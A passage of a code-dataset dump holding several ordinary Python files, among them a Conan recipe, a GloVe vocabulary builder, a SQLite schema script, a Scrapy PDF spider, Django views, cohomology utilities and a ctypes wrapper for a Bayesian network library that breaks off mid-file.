self.run('ctest --output-on-failure --exclude-regex gtest_catch_exceptions_test', cwd=self.build_folder)\n\n def package(self):\n build_dir = os.path.join(self.build_folder, 'build')\n self.run('cmake --build {0} --target install -- DESTDIR={1}'.format(build_dir, self.package_folder))\n\n def package_info(self):\n self.cpp_info.rootpath = os.path.join(self.package_folder, 'usr')\n self.cpp_info.libdir = os.path.join(self.cpp_info.rootpath, 'lib')\n\n lib_suffix = 'd' if self.settings.build_type == 'Debug' else ''\n self.cpp_info.libs = [\n 'gtest' + lib_suffix,\n 'gtest_main' + lib_suffix,\n 'gmock' + lib_suffix,\n 'gmock_main' + lib_suffix\n ]\n","sub_path":"googletest/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"54057404","text":"import numpy as np\nimport unicodedata\n\ndef normalize_text(text):\n return unicodedata.normalize('NFD', text)\n\ndef build_vocabulary(documents, glove_vocabulary=None):\n words = {'': {'count': 0, 'id': 0}, '': {'count': 0, 'id': 1}}\n ids = ['', '']\n words_ignored = {}\n\n for document in documents:\n for word in document:\n if word not in words:\n if glove_vocabulary == None:\n words[word] = {'count': 0, 'id': len(words)}\n ids.append(word)\n else:\n if word in glove_vocabulary:\n words[word] = {'count': 0, 'id': len(words)}\n ids.append(word)\n if word in words:\n words[word]['count'] = words[word]['count'] + 1\n else:\n if word not in words_ignored:\n words_ignored[word] = 0\n words_ignored[word] += 1\n\n return {'words': words, 'ids': ids, 'words_ignored': words_ignored}\n\ndef words2ids(words, vocabulary, unknown='ignore'):\n #word not in vocabulary if\n #a. test set\n #b. word not in glove\n #unknown can be\n #'ignore'\n #'unknown_id'\n #'fail'\n if unknown == 'fail':\n return [vocabulary['words'][word]['id'] for word in words]\n elif unknown == 'unkwown_id':\n return [vocabulary['words'][word]['id'] if word in vocabulary['words'] else vocabulary_unknown_id for word in words]\n else:\n return [vocabulary['words'][word]['id'] for word in words if word in vocabulary['words']]\n \ndef load_glove_vocabulary(opt):\n vocabulary = set()\n with open(opt['glove_file'], encoding=\"utf8\") as f:\n for line in f:\n elems = line.split()\n token = normalize_text(''.join(elems[0:-opt['glove_dim']]))\n vocabulary.add(token)\n return vocabulary\n\ndef build_embeddings(opt, vocabulary):\n vocabulary_size = len(vocabulary['words'])\n embeddings = np.random.uniform(-1, 1, (vocabulary_size, opt['glove_dim']))\n embeddings[0] = 0 # should be all 0 (using broadcast)\n\n with open(opt['glove_file'], encoding=\"utf8\") as f:\n for line in f:\n elems = line.split()\n token = normalize_text(''.join(elems[0:-opt['glove_dim']]))\n if token in vocabulary['words']:\n embeddings[vocabulary['words'][token]['id']] = [float(v) for v in elems[-opt['glove_dim']:]]\n return embeddings\n\n\n","sub_path":"Experiments/TextClassification/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"277292903","text":"#!/usr/bin/env python3\n'''\n@author: Winter Snowfall\n@version: 2.60\n@date: 27/01/2022\n\nWarning: Built for use with python 3.6+\n'''\n\nimport sqlite3\nimport logging\nimport argparse\nimport os\n\n##logging configuration block\nlog_file_full_path = os.path.join('..', 'logs', 'gog_create_db.log')\nlogger_file_handler = logging.FileHandler(log_file_full_path, mode='w', encoding='utf-8')\nlogger_format = '%(asctime)s %(levelname)s >>> %(message)s'\nlogger_file_handler.setFormatter(logging.Formatter(logger_format))\n#logging level for other modules\nlogging.basicConfig(format=logger_format, level=logging.ERROR) #DEBUG, INFO, WARNING, ERROR, CRITICAL\nlogger = logging.getLogger(__name__)\n#logging level for current logger\nlogger.setLevel(logging.INFO) #DEBUG, INFO, WARNING, ERROR, CRITICAL\nlogger.addHandler(logger_file_handler)\n\n##db configuration block\ndb_file_full_path = os.path.join('..', 'output_db', 'gog_visor.db')\n\n##CONSTANTS\nCREATE_GOG_FILES_QUERY = ('CREATE TABLE gog_files (gf_int_nr INTEGER PRIMARY KEY AUTOINCREMENT, '\n 'gf_int_added TEXT NOT NULL, '\n 'gf_int_removed TEXT, '\n 'gf_int_id INTEGER NOT NULL, '\n 'gf_int_download_type TEXT NOT NULL, '\n 'gf_id INTEGER NOT NULL, '\n 'gf_name TEXT NOT NULL, '\n 'gf_os TEXT, '\n 'gf_language TEXT, '\n 'gf_version TEXT, '\n 'gf_type TEXT, '\n 'gf_count INTEGER, '\n 'gf_total_size INTEGER NOT NULL, '\n 'gf_file_id TEXT NOT NULL, '\n 'gf_file_size INTEGER NOT NULL)')\n\nCREATE_GOG_PRICES_QUERY = ('CREATE TABLE gog_prices (gpr_int_nr INTEGER PRIMARY KEY AUTOINCREMENT, '\n 'gpr_int_added TEXT NOT NULL, '\n 'gpr_int_outdated TEXT, '\n 'gpr_int_id INTEGER NOT NULL, '\n 'gpr_int_title TEXT, '\n 'gpr_int_country_code TEXT NOT NULL, '\n 'gpr_currency TEXT NOT NULL, '\n 'gpr_base_price REAL NOT NULL, '\n 'gpr_final_price REAL NOT NULL)')\n\nCREATE_GOG_PRODUCTS_QUERY = ('CREATE TABLE gog_products (gp_int_nr INTEGER PRIMARY KEY AUTOINCREMENT, '\n 'gp_int_added TEXT NOT NULL, '\n 'gp_int_delisted TEXT, '\n 'gp_int_updated TEXT, '\n 'gp_int_json_payload TEXT NOT NULL, '\n 'gp_int_json_diff TEXT, '\n 'gp_int_v2_updated TEXT, '\n 'gp_int_v2_json_payload TEXT, '\n 'gp_int_v2_json_diff TEXT, '\n 'gp_int_is_movie INTEGER NOT NULL, '\n 'gp_v2_developer TEXT, '\n 'gp_v2_publisher TEXT, '\n 'gp_v2_tags TEXT, '\n 'gp_v2_series TEXT, '\n 'gp_v2_features TEXT, '\n 'gp_v2_is_using_dosbox INTEGER, '\n 'gp_id INTEGER UNIQUE NOT NULL, '\n 'gp_title TEXT, '\n 'gp_slug TEXT NOT NULL, '\n 'gp_cs_compat_windows INTEGER NOT NULL, '\n 'gp_cs_compat_osx INTEGER NOT NULL, '\n 'gp_cs_compat_linux INTEGER NOT NULL, '\n 'gp_languages TEXT, '\n 'gp_links_forum TEXT, '\n 'gp_links_product_card TEXT, '\n 'gp_links_support TEXT, '\n 'gp_in_development INTEGER NOT NULL, '\n 'gp_is_installable INTEGER NOT NULL, '\n 'gp_game_type TEXT NOT NULL, '\n 'gp_is_pre_order INTEGER NOT NULL, '\n 'gp_release_date TEXT, '\n 'gp_description_lead TEXT, '\n 'gp_description_full TEXT, '\n 'gp_description_cool TEXT, '\n 'gp_changelog TEXT)')\n\n##main thread start\n\n#added support for optional command-line parameter mode switching\nparser = argparse.ArgumentParser(description=('GOG DB create (part of gog_visor) - a script to create the sqlite DB structure '\n 'for the other gog_visor utilities.'))\n\nargs = parser.parse_args()\n\n#db file check/creation section\nif not os.path.exists(db_file_full_path):\n logger.info('No DB file detected. Creating new SQLite DB...')\n \n with sqlite3.connect(db_file_full_path) as db_connection:\n db_cursor = db_connection.cursor()\n db_cursor.execute(CREATE_GOG_FILES_QUERY)\n db_cursor.execute('CREATE INDEX gf_int_id_index ON gog_files (gf_int_id)')\n db_cursor.execute(CREATE_GOG_PRICES_QUERY)\n db_cursor.execute('CREATE INDEX gpr_int_id_index ON gog_prices (gpr_int_id)')\n db_cursor.execute(CREATE_GOG_PRODUCTS_QUERY)\n db_connection.commit()\n \n logger.info('DB created successfully.')\nelse:\n logger.error('Existing DB file detected. Please delete the existing file if you are attempting to recreate the DB!')\n\n##main thread end\n","sub_path":"scripts/gog_create_db.py","file_name":"gog_create_db.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"543455139","text":"import os.path\nimport tempfile\nfrom urllib.parse import urlparse\n\nfrom scrapy.exceptions import CloseSpider, IgnoreRequest\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom scrapy.utils.project import get_project_settings\nfrom twisted.internet.error import DNSLookupError\nfrom twisted.internet.error import TimeoutError\nimport scrapy\n\nfrom ..items import Article\n\n\nclass BaseSpider(scrapy.Spider):\n\n schemes = ['http', 'https', 'ftp', 'ftps']\n\n\n @staticmethod\n def jobdir(scraper_name):\n return os.path.join(\n # NB: tried to use get_project_settings()['FEED_TEMPDIR']\n # here, but it was inexplicably None. Anywhere in /tmp is\n # fine though.\n '/tmp',\n 'crawls',\n scraper_name\n )\n\n def __init__(self, *args, **kwargs):\n id = kwargs.get('uuid', '')\n self.uuid = id\n\n def on_error(self, failure):\n\n if failure.check(HttpError):\n response = failure.value.response\n self.logger.warning('HttpError (%s) on %s',\n response.url, response.status)\n\n elif failure.check(DNSLookupError):\n request = failure.request\n self.logger.warning('DNSLookupError on %s', request.url)\n\n elif failure.check(TimeoutError):\n request = failure.request\n self.logger.warning('TimeoutError on %s', request.url)\n\n # Catch the case where robots.txt files forbid a page\n elif failure.check(IgnoreRequest):\n request = failure.request\n self.logger.warning('Robots.txt forbidden on %s', request.url)\n\n else:\n self.logger.error(repr(failure))\n\n def _check_headers(self, response_headers,\n desired_extension=b'application/pdf'):\n content_type = response_headers.get('content-type', '').split(b';')[0]\n return desired_extension == content_type\n\n def _is_valid_pdf(self, response):\n \"\"\" Test if a response is a PDF\n\n We allow a pdf if it's file extension is not .pdf but\n its content-type is explicitly `application/pdf`\n\n Args:\n response: The request response\n extension: The type of extension to limit to\n mimetype: Either a **list|tuple** of or single mimetype\n to limit the URL to\n \"\"\"\n\n # Check the headers of the response\n is_pdf_type, is_octet_type = self._get_response_typing(response)\n\n if is_pdf_type:\n return True\n\n if is_octet_type:\n # If the response is an octet, make sure its a pdf\n # as this could result in trying to download images,\n # word docs, powerpoints, etc...\n url = response.urljoin(response.request.url)\n return self._is_valid_pdf_url(url)\n else:\n return False\n\n def _get_response_typing(self, response):\n \"\"\" Test if a response has valid content-type headers\n\n Args:\n response: HTTP request response\n \"\"\"\n response_headers = response.headers\n content_type = response_headers.get('content-type', '').split(b';')[0]\n\n is_pdf_type = b'application/pdf' == content_type\n is_octet_type = b'application/octet-stream' == content_type\n\n return (is_pdf_type, is_octet_type)\n\n def _is_valid_pdf_url(self, url):\n \"\"\" Check if a URL represents a valid URL path\n\n Args:\n url: The URL to test\n \"\"\"\n if url in ('', None,):\n return False\n\n try:\n scheme, netloc, path, params, query, fragment = urlparse(url)\n except ValueError: # For example invalid IPV6 URL or something\n return False\n\n if scheme != '' and scheme not in self.schemes:\n return False\n\n if not path.lower().endswith(\".pdf\"):\n return False\n\n return True\n\n def save_pdf(self, response, allow_octet=False):\n \"\"\" Save the response body to a temporary PDF file.\n\n If the response body is PDF-typed, save the PDF to a tempfile to parse\n it later. Else, just drop te item.\n\n The item will be later deleted in the pipeline.py file.\n\n Args:\n - response: The reponse object passed by scrapy\n\n Returns:\n - A scrapy Article item.\n \"\"\"\n\n data_dict = response.meta.get('data_dict', {})\n\n # Handle application/octet-stream in case some servers\n # don't provide a specific content-type in the response\n # as well as verify that path belongs to a PDF file.\n is_pdf = self._is_valid_pdf(response)\n\n if not is_pdf:\n self.logger.info('Not a PDF, aborting (%s)', response.url)\n return\n\n if not response.body:\n self.logger.warning(\n 'Empty filename or content, could not save the file.'\n ' [Url: %s]',\n response.request.url\n )\n return\n\n # Try and get filename from Content-Disposition\n disposition_name = None\n cd_header = response.headers.get(\"Content-Disposition\", None)\n if cd_header:\n cd_items = [x.split(b\"=\") for x in cd_header.split(b';')[1:] if b\"=\" in x]\n cd_items = dict((item[0].strip().lower(), item[1]) for item in cd_items if item[0] is not None)\n disposition_name = cd_items.get(b\"name\", None)\n if disposition_name is None:\n disposition_name = cd_items.get(b\"filename\", None)\n if disposition_name is None:\n disposition_name = cd_items.get(b'filename*', None)\n\n if disposition_name:\n disposition_name = disposition_name.decode('utf-8', 'ignore')\n\n max_article = self.settings.getint('MAX_ARTICLE')\n current_item_count = self.crawler.stats.get_value('item_scraped_count')\n if max_article > 0 and current_item_count:\n if current_item_count >= max_article:\n raise CloseSpider(\n 'Specified article count ({max_article}) raised'.format(\n max_article=max_article,\n )\n )\n\n # Download PDF file to /tmp\n with tempfile.NamedTemporaryFile(delete=False) as tf:\n tf.write(response.body)\n filename = tf.name\n\n # TODO: Get the filename from Content-Disposition header if available\n article = Article({\n 'title': data_dict.get('title', None),\n 'url': response.request.url,\n 'url_filename': response.request.url.split(\"/\")[-1],\n 'year': data_dict.get('year', None),\n 'authors': data_dict.get('authors', None),\n 'types': data_dict.get('types', None),\n 'subjects': data_dict.get('subjects', None),\n 'pdf': filename,\n 'page_title': data_dict.get('page_title', None),\n 'source_page': data_dict.get('source_page', None),\n 'link_title': data_dict.get('link_text', None),\n 'page_headings': data_dict.get('page_headings', None),\n 'disposition_title': disposition_name\n })\n\n return article\n","sub_path":"pipeline/reach-scraper/wsf_scraping/spiders/base_spider.py","file_name":"base_spider.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"138014432","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Project\nfrom .form import ProjectForm, RawProjectForm\n\n# Create your views here.\ndef home_view(request,*args,**kwargs):\n queryset = Project.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, \"home.html\", context)\n\ndef about_view(request):\n form = ProjectForm(request.POST or None)\n if form.is_valid():\n form.save()\n form = ProjectForm()\n context = {\n 'form': form\n }\n return render(request, 'about.html', context)\ndef contact_view(request, *args, **kwargs):\n context = {}\n return render(request, \"contact.html\", context)\n\ndef project_detail_view(request):\n my_form = RawProjectForm()\n if request.method == \"POST\":\n my_form = RawProjectForm(request.POST)\n if my_form.is_valid():\n Project.objects.create(**my_form.cleaned_data)\n my_form = RawProjectForm\n context = {\n 'form': my_form\n }\n return render(request, \"project/detail.html\",context)\n\n# def render_initial_data(request):\n# initial_data = {\n# \"title\": \"my awesome title\"\n# }\n# obj = Project.objects.get(id=1)\n# form = ProjectForm(request.POST or None, instance=obj)\n# if form.is_valid():\n# form.save()\n# form=ProjectForm\n# context = {\n# 'form': form\n# }\n#\n#\n# return render(request, \"project/render.html\", context)\n\ndef render_initial_data(request, id):\n # form = Project.objects.get(id=id)\n form = get_object_or_404(Project, id=id)\n\n\n control = {\n \"control\": form\n }\n return render(request, \"project/render.html\", control)\n\ndef project_delete(request, id):\n form = get_object_or_404(Project, id=id)\n if request.method == \"POST\":\n form.delete()\n return redirect(\"/\")\n context = {\n \"form\":form\n }\n\n return render(request, \"project/project_delete.html\", context)\n\ndef project_list(request):\n queryset = Project.objects.all()\n\n context = {\n \"object_list\":queryset\n }\n\n return render(request, \"project/project_list.html\", context)","sub_path":"project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"623634719","text":"\"\"\"\nProgrammer: Chris Tralie (ctralie@alumni.princeton.edu)\nPurpose: To provide tools for quickly computing all pairs self-similarity\nand cross-similarity matrices, for doing \"greedy permutations,\" and for\nsome topological operations like adding cocycles and creating partitions of unity\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.misc\nimport scipy.sparse as sparse\n\n\"\"\"#########################################\n Self-Similarity And Cross-Similarity\n#########################################\"\"\"\n\ndef get_csm(X, Y):\n \"\"\"\n Return the Euclidean cross-similarity matrix between the M points\n in the Mxd matrix X and the N points in the Nxd matrix Y.\n \n Parameters\n ----------\n X : ndarray (M, d)\n A matrix holding the coordinates of M points\n Y : ndarray (N, d) \n A matrix holding the coordinates of N points\n Returns\n ------\n D : ndarray (M, N)\n An MxN Euclidean cross-similarity matrix\n \"\"\"\n C = np.sum(X**2, 1)[:, None] + np.sum(Y**2, 1)[None, :] - 2*X.dot(Y.T)\n C[C < 0] = 0\n return np.sqrt(C)\n\ndef get_csm_projarc(X, Y):\n \"\"\"\n Return the projective arc length cross-similarity between two point\n clouds specified as points on the sphere\n Parameters\n ----------\n X : ndarray (M, d)\n A matrix holding the coordinates of M points on RP^{d-1}\n Y : ndarray (N, d) \n A matrix holding the coordinates of N points on RP^{d-1}\n Returns\n ------\n D : ndarray (M, N)\n An MxN cross-similarity matrix\n \"\"\"\n D = np.abs(X.dot(Y.T))\n D[D < -1] = -1\n D[D > 1] = 1\n D = np.arccos(np.abs(D))\n return D\n\ndef get_ssm(X):\n return get_csm(X, X)\n\n\n\"\"\"#########################################\n Greedy Permutations\n#########################################\"\"\"\n\ndef get_greedy_perm_pc(X, M, verbose = False, csm_fn = get_csm):\n \"\"\"\n A Naive O(NM) algorithm to do furthest points sampling, assuming\n the input is a point cloud specified in Euclidean space. This saves \n computation over having compute the full distance matrix if the number\n of landmarks M << N\n \n Parameters\n ----------\n X : ndarray (N, d) \n An Nxd Euclidean point cloud\n M : integer\n Number of landmarks to compute\n verbose: boolean\n Whether to print progress\n csm_fn: function X, Y -> D\n Cross-similarity function (Euclidean by default)\n\n Return\n ------\n result: Dictionary\n {'Y': An Mxd array of landmarks, \n 'perm': An array of indices into X of the greedy permutation\n 'lambdas': Insertion radii of the landmarks\n 'D': An MxN array of distances from landmarks to points in X}\n \"\"\"\n # By default, takes the first point in the permutation to be the\n # first point in the point cloud, but could be random\n N = X.shape[0]\n perm = np.zeros(M, dtype=np.int64)\n lambdas = np.zeros(M)\n ds = csm_fn(X[0, :][None, :], X).flatten()\n D = np.zeros((M, N))\n D[0, :] = ds\n for i in range(1, M):\n idx = np.argmax(ds)\n perm[i] = idx\n lambdas[i] = ds[idx]\n thisds = csm_fn(X[idx, :][None, :], X).flatten()\n D[i, :] = thisds\n ds = np.minimum(ds, thisds)\n Y = X[perm, :]\n return {'Y':Y, 'perm':perm, 'lambdas':lambdas, 'D':D}\n\ndef get_greedy_perm_dm(D, M, verbose = False):\n \"\"\"\n A Naive O(NM) algorithm to do furthest points sampling, assuming\n the input is a N x N distance matrix\n \n Parameters\n ----------\n D : ndarray (N, N) \n An N x N distance matrix\n M : integer\n Number of landmarks to compute\n verbose: boolean\n Whether to print progress\n\n Return\n ------\n result: Dictionary\n {'perm': An array of indices into X of the greedy permutation\n 'lambdas': Insertion radii of the landmarks\n 'DLandmarks': An MxN array of distances from landmarks to points in the point cloud}\n \"\"\"\n # By default, takes the first point in the permutation to be the\n # first point in the point cloud, but could be random\n N = D.shape[0]\n perm = np.zeros(M, dtype=np.int64)\n lambdas = np.zeros(M)\n ds = D[0, :]\n for i in range(1, M):\n idx = np.argmax(ds)\n perm[i] = idx\n lambdas[i] = ds[idx]\n ds = np.minimum(ds, D[idx, :])\n DLandmarks = D[perm, :] \n return {'perm':perm, 'lambdas':lambdas, 'DLandmarks':DLandmarks}\n\n\n\n\"\"\"#########################################\n Cohomology Utility Functions\n#########################################\"\"\"\n\ndef add_cocycles(c1, c2, p = 2, real = False):\n S = {}\n c = np.concatenate((c1, c2), 0)\n for k in range(c.shape[0]):\n [i, j, v] = c[k, :]\n i, j = min(i, j), max(i, j)\n if not (i, j) in S:\n S[(i, j)] = v\n else:\n S[(i, j)] += v\n cret = np.zeros((len(S), 3))\n cret[:, 0:2] = np.array([s for s in S])\n cret[:, 2] = np.array([np.mod(S[s], p) for s in S])\n dtype = np.int64\n if real:\n dtype = np.float32\n cret = np.array(cret[cret[:, -1] > 0, :], dtype = dtype)\n return cret\n\ndef make_delta0(R):\n \"\"\"\n Return the delta0 coboundary matrix\n :param R: NEdges x 2 matrix specifying edges, where orientation\n is taken from the first column to the second column\n R specifies the \"natural orientation\" of the edges, with the\n understanding that the ranking will be specified later\n It is assumed that there is at least one edge incident\n on every vertex\n \"\"\"\n NVertices = int(np.max(R) + 1)\n NEdges = R.shape[0]\n \n #Two entries per edge\n I = np.zeros((NEdges, 2))\n I[:, 0] = np.arange(NEdges)\n I[:, 1] = np.arange(NEdges)\n I = I.flatten()\n \n J = R[:, 0:2].flatten()\n \n V = np.zeros((NEdges, 2))\n V[:, 0] = -1\n V[:, 1] = 1\n V = V.flatten()\n I = np.array(I, dtype=int)\n J = np.array(J, dtype=int)\n Delta = sparse.coo_matrix((V, (I, J)), shape=(NEdges, NVertices)).tocsr()\n return Delta\n\ndef reindex_cocycles(cocycles, idx_land, N):\n \"\"\"\n Convert the indices of a set of cocycles to be relative\n to a list of indices in a greedy permutation\n Parameters\n ----------\n cocycles: list of list of ndarray\n The cocycles\n idx_land: ndarray(M, dtype=int)\n Indices of the landmarks in the greedy permutation, with\n respect to all points\n N: int\n Number of total points\n \"\"\"\n idx_map = -1*np.ones(N, dtype=int)\n idx_map[idx_land] = np.arange(idx_land.size)\n for ck in cocycles:\n for c in ck:\n c[:, 0:-1] = idx_map[c[:, 0:-1]]\n\n\n\"\"\"#########################################\n Partition of Unity Functions\n#########################################\"\"\"\n\ndef partunity_linear(ds, r_cover):\n \"\"\"\n Parameters\n ----------\n ds: ndarray(n)\n Some subset of distances between landmarks and \n data points\n r_cover: float\n Covering radius\n Returns\n -------\n varphi: ndarray(n)\n The bump function\n \"\"\"\n return r_cover - ds\n\ndef partunity_quadratic(ds, r_cover):\n \"\"\"\n Parameters\n ----------\n ds: ndarray(n)\n Some subset of distances between landmarks and \n data points\n r_cover: float\n Covering radius\n Returns\n -------\n varphi: ndarray(n)\n The bump function\n \"\"\"\n return (r_cover - ds)**2\n\ndef partunity_exp(ds, r_cover):\n \"\"\"\n Parameters\n ----------\n ds: ndarray(n)\n Some subset of distances between landmarks and \n data points\n r_cover: float\n Covering radius\n Returns\n -------\n varphi: ndarray(n)\n The bump function\n \"\"\"\n return np.exp(r_cover**2/(ds**2-r_cover**2))\n\nPARTUNITY_FNS = {'linear':partunity_linear, 'quadratic':partunity_quadratic, 'exp':partunity_exp}\n","sub_path":"dreimac/geomtools.py","file_name":"geomtools.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"334124143","text":"import zipfile\nimport json\nimport glob\nimport os\n\n\ndef save_json(filename, json_str):\n with open(filename, \"w\") as f:\n new_dict = json.loads(json_str)\n json.dump(new_dict, f)\n print(\"加载入文件完成...\")\n\n\ndef zip_files(files, zip_name):\n files = glob.glob(files)\n f = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)\n\n for file in files:\n f.write(file, os.path.basename(file))\n f.close()\n\n # files = ['.\\\\123.txt', '.\\\\3.txt'] # 文件的位置,多个文件用“,”隔开\n # zip_file = '.\\\\m66y.zip' # 压缩包名字\n # zip_files(files, zip_file)\n\n\nif __name__ == \"__main__\":\n files =\"../../doc/Vectors/*\"\n zip_files(files,'../../doc/Vectors/test.zip')\n","sub_path":"app/util/file_helper.py","file_name":"file_helper.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"84952303","text":"import datetime\nimport uuid\nfrom lib.casevaultdb import VcfSampleCollection, CaseCollection, QueryLogsCollection\nfrom query.query_base import QueryBase, QueryDesc, QueryDescParam\n\nclass Denovo(QueryBase):\n\n metadata = {\n 'id': '4',\n 'name': 'variant is in-cis',\n 'description': 'query for snp matching optional family history, population, or clnical ids',\n 'help': '',\n 'parameters': {\n 'chrom': {'type': 'str', 'required': True},\n 'position': {'type': 'str', 'required': True},\n 'allele': {'type': 'str', 'required': True},\n 'clinic_indications': {'type': 'str_arr', 'required': False},\n 'family_history': {'type': 'bool', 'required': False},\n 'populations': {'type': 'str_arr', 'required': False}\n }\n }\n \n @staticmethod\n def get_query_description():\n \"\"\" returns query details to the query controllers api \"\"\"\n return Denovo.metadata\n\n def execute_hub_query(self, parameters):\n \"\"\" Case vault query to return results to the hub \"\"\"\n \n return 0\n\n\ndef execute_casevault_query(self, parameters):\n \"\"\" Execute the query and return detailed results for the case vault \"\"\"","sub_path":"vault/src/query/denovo.py","file_name":"denovo.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"63264000","text":"from celery import shared_task\nfrom celery.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\nfrom .views import contract_queries\nfrom .models import ContractData\n\n\n# @periodic_task(run_every=(crontab(minute='*/1')), name=\"to_contractdata_model\", ignore_result=True)\n@periodic_task(run_every=(crontab(minute=0, hour=23, day_of_week='friday')),\n name=\"to_contractdata_model\",\n ignore_result=True)\ndef to_contractdata_model():\n contract_stats_dict = contract_queries()\n\n for key, value in contract_stats_dict.items():\n value = [0 if v is None else v for v in value]\n department = key\n contracts_qty = value[0]\n contracts_sum_total = value[1]\n contracts_sum_avg = value[2]\n contract_length_avg = value[3]\n\n ContractData.objects.create(\n department=department,\n contracts_qty=contracts_qty,\n contracts_sum_total=contracts_sum_total,\n contracts_sum_avg=contracts_sum_avg,\n contract_length_avg=contract_length_avg\n )\n\n return None\n","sub_path":"src/dashboard/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"508119796","text":"import pyautogui\nfrom win32api import GetSystemMetrics\n\ndef moveNscroll(val, x=None, y=None, duration=1):\n if x==None or y==None:\n # if no x and y value given it will automaticly detect your screen size and move mouse to near to the top right of the screen and scroll\n x = GetSystemMetrics(0)\n y = GetSystemMetrics(1)\n pyautogui.moveTo(x-(x*1/15), y-(y*8/10), duration)\n else: \n pyautogui.moveTo(x, y, duration)\n pyautogui.scroll(val)\n\n# if __name__ == \"__main__\":\n# moveNscroll(100)","sub_path":"mouseMove.py","file_name":"mouseMove.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"296276719","text":"from __future__ import print_function\r\nfrom builtins import range\r\nfrom builtins import bytes\r\nimport ctypes, re, sys\r\n\r\nif sys.maxsize > 2**32:\r\n\tg = ctypes.windll.LoadLibrary(\"bismile64.dll\")\r\nelse:\r\n\tg = ctypes.windll.LoadLibrary(\"bismile.dll\")\r\n\r\n# This is so that functions return pointer-like objects,\r\n# rather than ints, which won't work on all platforms\r\n# See: https://code.activestate.com/lists/python-list/702828/\r\nclass VOID(ctypes.Structure):\r\n\tpass\r\n\t\r\nclass c_simplechar_p(ctypes.c_char_p):\r\n\t@classmethod\r\n\tdef from_param(cls, obj):\r\n\t\treturn bytes(obj, 'ascii')\r\n\t\r\n\t@classmethod\r\n\tdef _check_retval_(cls, result):\r\n\t\treturn result.value.decode('utf-8')\r\n\r\ng.new_network.restype = ctypes.POINTER(VOID)\r\ng.new_intArray.restype = ctypes.POINTER(VOID)\r\ng.intArray_Items.restype = ctypes.POINTER(ctypes.c_int)\r\ng.GetParents.restype = ctypes.POINTER(VOID)\r\ng.header_SetId.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.header_GetId.restype = ctypes.POINTER(VOID)\r\ng.header_SetName.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.header_GetName.restype = c_simplechar_p\r\ng.node_Definition.argtypes = [ctypes.POINTER(VOID)]\r\ng.node_Definition.restype = ctypes.POINTER(VOID)\r\ng.nodeDefinition_GetMatrix.restype = ctypes.POINTER(VOID)\r\ng.nodeDefinition_GetStringDefinition.restype = ctypes.POINTER(c_simplechar_p)\r\ng.nodeDefinition_GetNumberOfOutcomes.restype = ctypes.c_int\r\ng.dMatrix_GetItemsDouble.restype = ctypes.POINTER(ctypes.c_double)\r\ng.dMatrix_GetSize.restype = ctypes.c_int\r\ng.nodeDefinition_GetOutcomesNames.restype = ctypes.POINTER(VOID)\r\ng.stringArray_Items.restype = ctypes.POINTER(c_simplechar_p)\r\ng.node_Value.restype = ctypes.POINTER(VOID)\r\ng.nodeValue_GetMatrix.restype = ctypes.POINTER(VOID)\r\ng.net_Header.restype = ctypes.POINTER(VOID)\r\ng.CalcProbEvidence.restype = ctypes.c_double\r\ng.nodeValue_GetVirtualEvidence.restype = ctypes.POINTER(ctypes.c_double)\r\ng.nodeValue_SetVirtualEvidence.restype = ctypes.c_int\r\ng.equation_SetEquation.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.equation_SetEquation.restype = ctypes.c_int\r\ng.valEqEvaluation_GetSampleMean.restype = ctypes.c_double\r\ng.GetDefaultBNAlgorithm.restype = ctypes.c_int\r\ng.FindNode.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.FindNode.restype = ctypes.POINTER(VOID)\r\ng.GetNode.restype = ctypes.POINTER(VOID)\r\ng.node_Info.restype = ctypes.POINTER(VOID)\r\ng.nodeInfo_Header.restype = ctypes.POINTER(VOID)\r\ng.header_GetId.restype = c_simplechar_p\r\ng.WriteFile.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.AddNode.argtypes = [ctypes.POINTER(VOID), ctypes.c_int, c_simplechar_p]\r\ng.nodeInfo_Screen.restype = ctypes.POINTER(VOID)\r\ng.screenInfo_position.restype = ctypes.POINTER(VOID)\r\n\r\n# Constants\r\nclass Node:\r\n\tNATURE_NODE, CONSTANT_NODE, DECISION_NODE, UTILITY_NODE, DISCONNECTED_NODE, \\\r\n\tEQUATION_NODE = list(range(1,7))\r\nclass Node(Node):\r\n\tNODE_TYPE_MAP = {\r\n\t\tNode.NATURE_NODE: 18, #DSL_CPT (=DSL_CHANCE|DSL_DISCRETE)\r\n\t\tNode.EQUATION_NODE: 4, # DSL_EQUATION/DSL_DETERMINISTIC\r\n\t\tNode.UTILITY_NODE: 8, # 